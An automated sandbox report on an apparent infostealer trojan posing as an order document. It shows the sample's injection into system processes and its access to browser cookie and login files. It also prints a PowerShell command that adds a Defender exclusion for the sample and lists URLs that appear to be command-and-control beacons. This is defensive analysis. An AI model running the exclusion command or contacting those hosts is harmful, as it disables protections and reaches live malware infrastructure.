            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018206F1 mov eax, dword ptr fs:[00000030h]6_2_018206F1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018206F1 mov eax, dword ptr fs:[00000030h]6_2_018206F1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E609 mov eax, dword ptr fs:[00000030h]6_2_0181E609
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]6_2_017DA6C7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DA6C7 mov eax, dword ptr fs:[00000030h]6_2_017DA6C7
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D66B0 mov eax, dword ptr fs:[00000030h]6_2_017D66B0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017DC6A6 mov eax, dword ptr fs:[00000030h]6_2_017DC6A6
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186866E mov eax, dword ptr fs:[00000030h]6_2_0186866E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186866E mov eax, dword ptr fs:[00000030h]6_2_0186866E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4690 mov eax, dword ptr fs:[00000030h]6_2_017A4690
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017A4690 mov eax, dword ptr fs:[00000030h]6_2_017A4690
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E mov eax, dword ptr fs:[00000030h]6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E mov edx, dword ptr fs:[00000030h]6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017E096E mov eax, dword ptr fs:[00000030h]6_2_017E096E
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C6962 mov eax, dword ptr fs:[00000030h]6_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C6962 mov eax, dword ptr fs:[00000030h]6_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017C6962 mov eax, dword ptr fs:[00000030h]6_2_017C6962
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018289B3 mov esi, dword ptr fs:[00000030h]6_2_018289B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018289B3 mov eax, dword ptr fs:[00000030h]6_2_018289B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018289B3 mov eax, dword ptr fs:[00000030h]6_2_018289B3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_018369C0 mov eax, dword ptr fs:[00000030h]6_2_018369C0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0186A9D3 mov eax, dword ptr fs:[00000030h]6_2_0186A9D3
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798918 mov eax, dword ptr fs:[00000030h]6_2_01798918
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_01798918 mov eax, dword ptr fs:[00000030h]6_2_01798918
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182E9E0 mov eax, dword ptr fs:[00000030h]6_2_0182E9E0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D29F9 mov eax, dword ptr fs:[00000030h]6_2_017D29F9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017D29F9 mov eax, dword ptr fs:[00000030h]6_2_017D29F9
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E908 mov eax, dword ptr fs:[00000030h]6_2_0181E908
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0181E908 mov eax, dword ptr fs:[00000030h]6_2_0181E908
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182C912 mov eax, dword ptr fs:[00000030h]6_2_0182C912
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0182892A mov eax, dword ptr fs:[00000030h]6_2_0182892A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_0183892B mov eax, dword ptr fs:[00000030h]6_2_0183892B
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: 6_2_017AA9D0 mov eax, dword ptr fs:[00000030h]6_2_017AA9D0
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                NtResumeThread: Direct from: 0x773836AC
                NtMapViewOfSection: Direct from: 0x77382D1C
                NtWriteVirtualMemory: Direct from: 0x77382E3C
                NtProtectVirtualMemory: Direct from: 0x77382F9C
                NtSetInformationThread: Direct from: 0x773763F9
                NtCreateMutant: Direct from: 0x773835CC
                NtNotifyChangeKey: Direct from: 0x77383C2C
                NtSetInformationProcess: Direct from: 0x77382C5C
                NtCreateUserProcess: Direct from: 0x7738371C
                NtQueryInformationProcess: Direct from: 0x77382C26
                NtResumeThread: Direct from: 0x77382FBC
                NtWriteVirtualMemory: Direct from: 0x7738490C
                NtAllocateVirtualMemory: Direct from: 0x77383C9C
                NtReadFile: Direct from: 0x77382ADC
                NtAllocateVirtualMemory: Direct from: 0x77382BFC
                NtDelayExecution: Direct from: 0x77382DDC
                NtQuerySystemInformation: Direct from: 0x77382DFC
                NtOpenSection: Direct from: 0x77382E0C
                NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                NtQuerySystemInformation: Direct from: 0x773848CC
                NtReadVirtualMemory: Direct from: 0x77382E8C
                NtCreateKey: Direct from: 0x77382C6C
                NtClose: Direct from: 0x77382B6C
                NtAllocateVirtualMemory: Direct from: 0x773848EC
                NtQueryAttributesFile: Direct from: 0x77382E6C
                NtSetInformationThread: Direct from: 0x77382B4C
                NtTerminateThread: Direct from: 0x77382FCC
                NtQueryInformationToken: Direct from: 0x77382CAC
                NtOpenKeyEx: Direct from: 0x77382B9C
                NtAllocateVirtualMemory: Direct from: 0x77382BEC
                NtDeviceIoControlFile: Direct from: 0x77382AEC
                NtCreateFile: Direct from: 0x77382FEC
                NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Memory written: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Section loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: read write
            Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\compact.exe Thread register set: target process: 7156
            Source: C:\Windows\SysWOW64\compact.exe Thread APC queued: target process: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe Process created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
            Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: IProgram Manager
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                Queries volume information: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Queries volume information: C:\ VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\compact.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\compact.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
            [Behavior graph: ID 1467079; Sample: spec 4008670601 AZTEK Order.exe; Startdate: 03/07/2024; Architecture: WINDOWS; Score: 100]

            Source | Detection | Scanner | Label | Link
            spec 4008670601 AZTEK Order.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
            spec 4008670601 AZTEK Order.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mengistiebethlehem.com/92z0/false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.artvectorcraft.store/s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mengistiebethlehem.com/92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.easybackpage.net/3jr0/false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.artvectorcraft.store/s0j2/false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ad14.fun/oc7s/false
                                                    • Avira URL Cloud: safe
                                                    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467079
Start date and time: 2024-07-03 17:49:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: spec 4008670601 AZTEK Order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@12/7@14/13
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 89%
                                                    • Number of executed functions: 172
                                                    • Number of non-executed functions: 285
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: spec 4008670601 AZTEK Order.exe
Time | Type | Description
11:50:07 | API Interceptor | 1x Sleep call for process: spec 4008670601 AZTEK Order.exe modified
11:50:09 | API Interceptor | 14x Sleep call for process: powershell.exe modified
11:51:25 | API Interceptor | 9957357x Sleep call for process: compact.exe modified
                                                    Process:C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
